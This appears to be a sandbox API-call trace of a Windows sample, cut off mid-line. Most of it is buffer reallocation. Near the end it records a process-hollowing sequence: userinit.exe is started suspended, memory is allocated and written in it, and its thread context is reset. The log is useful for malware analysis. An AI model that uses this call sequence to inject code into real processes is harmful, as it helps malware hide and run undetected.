[0269.813] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0269.814] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0269.814] GlobalUnlock (hMem=0x95000c) returned 0
[0269.814] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0269.815] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.816] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.816] GlobalUnlock (hMem=0x95000c) returned 0
[0269.816] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0269.817] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.818] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.818] GlobalUnlock (hMem=0x95000c) returned 0
[0269.818] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0269.818] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.819] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.819] GlobalUnlock (hMem=0x95000c) returned 0
[0269.819] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0269.819] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.820] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.820] GlobalUnlock (hMem=0x95000c) returned 0
[0269.820] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0269.820] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.821] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.821] GlobalUnlock (hMem=0x95000c) returned 0
[0269.821] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0269.821] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.822] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.822] GlobalUnlock (hMem=0x95000c) returned 0
[0269.822] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0269.822] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.823] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.823] GlobalUnlock (hMem=0x95000c) returned 0
[0269.823] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0269.823] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.824] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.824] GlobalUnlock (hMem=0x95000c) returned 0
[0269.824] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0269.824] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.825] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.825] GlobalUnlock (hMem=0x95000c) returned 0
[0269.825] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0269.826] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.827] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.827] GlobalUnlock (hMem=0x95000c) returned 0
[0269.827] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0269.829] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0269.830] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0269.830] GlobalUnlock (hMem=0x95000c) returned 0
[0269.830] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0269.830] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0269.831] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0269.831] GlobalUnlock (hMem=0x95000c) returned 0
[0269.831] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0269.832] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0269.833] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0269.833] GlobalUnlock (hMem=0x95000c) returned 0
[0269.833] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0269.834] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.834] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.834] GlobalUnlock (hMem=0x95000c) returned 0
[0269.834] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0269.834] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.835] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.835] GlobalUnlock (hMem=0x95000c) returned 0
[0269.835] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0269.835] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.836] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.836] GlobalUnlock (hMem=0x95000c) returned 0
[0269.836] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0269.836] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.837] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.837] GlobalUnlock (hMem=0x95000c) returned 0
[0269.837] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0269.837] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.838] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.838] GlobalUnlock (hMem=0x95000c) returned 0
[0269.838] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0269.838] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.839] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.839] GlobalUnlock (hMem=0x95000c) returned 0
[0269.839] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0269.839] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.840] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.840] GlobalUnlock (hMem=0x95000c) returned 0
[0269.840] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0269.840] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.841] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.841] GlobalUnlock (hMem=0x95000c) returned 0
[0269.841] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0269.842] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.843] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.843] GlobalUnlock (hMem=0x95000c) returned 0
[0269.843] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0269.843] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.844] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.844] GlobalUnlock (hMem=0x95000c) returned 0
[0269.844] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0269.844] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.845] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.845] GlobalUnlock (hMem=0x95000c) returned 0
[0269.845] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0269.845] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.846] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.846] GlobalUnlock (hMem=0x95000c) returned 0
[0269.846] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0269.846] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.847] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.847] GlobalUnlock (hMem=0x95000c) returned 0
[0269.847] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0269.847] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.848] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.848] GlobalUnlock (hMem=0x95000c) returned 0
[0269.848] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0269.848] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.849] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.849] GlobalUnlock (hMem=0x95000c) returned 0
[0269.849] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0269.849] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.850] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.850] GlobalUnlock (hMem=0x95000c) returned 0
[0269.850] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0269.850] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.851] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.851] GlobalUnlock (hMem=0x95000c) returned 0
[0269.851] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0269.851] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.852] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.852] GlobalUnlock (hMem=0x95000c) returned 0
[0269.852] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0269.852] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.853] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.853] GlobalUnlock (hMem=0x95000c) returned 0
[0269.853] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0269.853] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.854] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.854] GlobalUnlock (hMem=0x95000c) returned 0
[0269.854] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0269.854] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.855] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.855] GlobalUnlock (hMem=0x95000c) returned 0
[0269.855] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0269.855] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.856] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.856] GlobalUnlock (hMem=0x95000c) returned 0
[0269.856] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0269.857] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.857] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.857] GlobalUnlock (hMem=0x95000c) returned 0
[0269.857] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0269.858] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.858] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.859] GlobalUnlock (hMem=0x95000c) returned 0
[0269.859] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0269.859] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.859] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.860] GlobalUnlock (hMem=0x95000c) returned 0
[0269.860] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0269.860] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.860] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.861] GlobalUnlock (hMem=0x95000c) returned 0
[0269.861] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0269.861] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.862] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.862] GlobalUnlock (hMem=0x95000c) returned 0
[0269.862] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0269.862] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.863] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0x174, hThread=0x178, dwProcessId=0xbb4, dwThreadId=0xb74)) returned 1
[0269.869] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0269.869] GetThreadContext (in: hThread=0x178, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0xd32be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0xafb80, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0269.869] ReadProcessMemory (in: hProcess=0x174, lpBaseAddress=0x7ffde008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0269.869] VirtualAllocEx (hProcess=0x174, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0269.870] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1e90000
[0269.870] VirtualAlloc (lpAddress=0x1e90000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x1e90000
[0269.872] VirtualAlloc (lpAddress=0x1e88000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x1e88000
[0269.877] WriteProcessMemory (in: hProcess=0x174, lpBaseAddress=0x400000, lpBuffer=0x1e85dc8*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x1e85dc8*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0269.890] WriteProcessMemory (in: hProcess=0x174, lpBaseAddress=0x7ffde008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0269.890] SetThreadContext (hThread=0x178, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0xafb80, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, 